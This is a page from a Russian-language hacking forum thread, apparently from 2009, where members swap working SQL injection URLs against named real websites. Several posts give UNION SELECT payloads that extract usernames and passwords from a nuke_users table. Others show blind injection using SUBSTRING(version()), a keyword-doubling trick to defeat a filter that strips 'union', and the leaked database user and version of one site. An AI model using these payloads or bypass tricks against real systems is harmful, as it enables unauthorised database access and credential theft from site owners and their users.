Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    http://www.xtrempc.ro/modules.php?id_articol=-8177+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,@@basedir,12,13,14,15,16,17,18,19,20&name=Articole&skin=0&subtip=Stire&tip=jocuri

    /usr/local/mysql/

    basedir съело..
     
  2. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    @@basedir, @@version_compile_os....etc
    такие запросы сьедает...я про основные и как мне вывести инфу из БД
     
  3. TreV@N

    TreV@N Elder - Старейшина

    Joined:
    14 Jul 2008
    Messages:
    135
    Likes Received:
    48
    Reputations:
    19
    Здравствуйте.Я нашел sql-inj подобрал столбцы http://shop.vuku.ru/index.php?productID=-445+union+select+1,2,3,4-- но почему-то я немогу даже версию узнать бд.В чем моя ошибка?Что оттуда можно вытащить?
     
    #7423 TreV@N, 8 Jun 2009
    Last edited: 8 Jun 2009
  4. laedafess

    laedafess Member

    Joined:
    11 Feb 2009
    Messages:
    70
    Likes Received:
    29
    Reputations:
    15
    Code:
    http://www.xtrempc.ro/modules.php?id_articol=-8177+UNION+SELECT+1,2,username,4,5,6,7,8,9,10,user_password,12,13,14,15,16,17,18,19,20+from+nuke_users+limit+1,1&name=Articole&skin=0&subtip=Stire&tip=jocuri
    все вроде нормально выводится, только скобочки нельзя ставить
     
    2 people like this.
  5. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    У тебя там вывода нету...используй как слепую..
    http://forum.antichat.ru/threadnav43966-1-10.html
    Пункт 3.3
     
  6. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    DimOnOID, а там разве слепая есть?
     
  7. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    Как минимум 2 варианта использования слепой....
    с задержкой сервера....или через ошибку мускуля…
     
  8. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Разве, что, но там не не перестает выводить при некорректном запросе. Забавная скуля...
     
  9. TreV@N

    TreV@N Elder - Старейшина

    Joined:
    14 Jul 2008
    Messages:
    135
    Likes Received:
    48
    Reputations:
    19
    Вроде в этом квесте http://realquest.real-host.ru/show.php?id=12' такая же скуля.
     
  10. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://realquest.real-host.ru/show.php?id=12+and+substring(version(),1,1)=5
     
  11. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    СКуль, давно находил уже как с открытия, там фильтр жёсткий
     
  12. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    TreV@N обычная слепая скуля
    http://realquest.real-host.ru/show.php?id=12+AND+SUBSTRING((version()),1,1)=x

    Version : 5.0.77-community
    User : realq137_quest@localhost
    Database : realq137_quest
     
  13. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    Чи не фильтр(Скуля зрячая, надо просто немного подумать:)):
    http://realquest.real-host.ru/show.php?id=-12+UNION+SeSelectlect+1,concat_ws(0x3a,user(),version(),database()),3,4--+
     
    1 person likes this.
  14. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Хех, там такой же фильтр, как я писал давно :) тупо удаляет юнион :).
     
  15. aqqa

    aqqa Banned

    Joined:
    12 Jul 2008
    Messages:
    96
    Likes Received:
    16
    Reputations:
    3
    Набрал такую ссылку,вывел мне запрос гляньте скажите че это
    http://www.spravkaweb.ru/javascript:_alert%28%27Hello_world%27%29%3B
     
  16. laedafess

    laedafess Member

    Joined:
    11 Feb 2009
    Messages:
    70
    Likes Received:
    29
    Reputations:
    15
    http://www.spravkaweb.ru/jhj'_union_select_1,2,3,concat(user(),0x3a,version()),5,'1
    забавная скуль)
    жаль, что знак подчеркивания на пробел заменяется...
     
    #7436 laedafess, 8 Jun 2009
    Last edited: 8 Jun 2009
  17. aqqa

    aqqa Banned

    Joined:
    12 Jul 2008
    Messages:
    96
    Likes Received:
    16
    Reputations:
    3
    этой скулью можно ченить сделать веселого?
     
  18. Nizhegorodets

    Nizhegorodets Member

    Joined:
    21 Mar 2009
    Messages:
    80
    Likes Received:
    66
    Reputations:
    9
    ребят помогите пожалуйста
    на одном сайте есть регалка в которой не фильтруется кавычка при этом база выдает ошибку такого вида

    Можно ли чего с этим сделать???
     
  19. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    Судя по выводимой ошибки для завершения запроса необходима кавычка а у тебя она слешируеться.
     
    1 person likes this.
  20. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    magic quotes экранирует кавычку..
     
    2 people like this.
Thread Status:
Not open for further replies.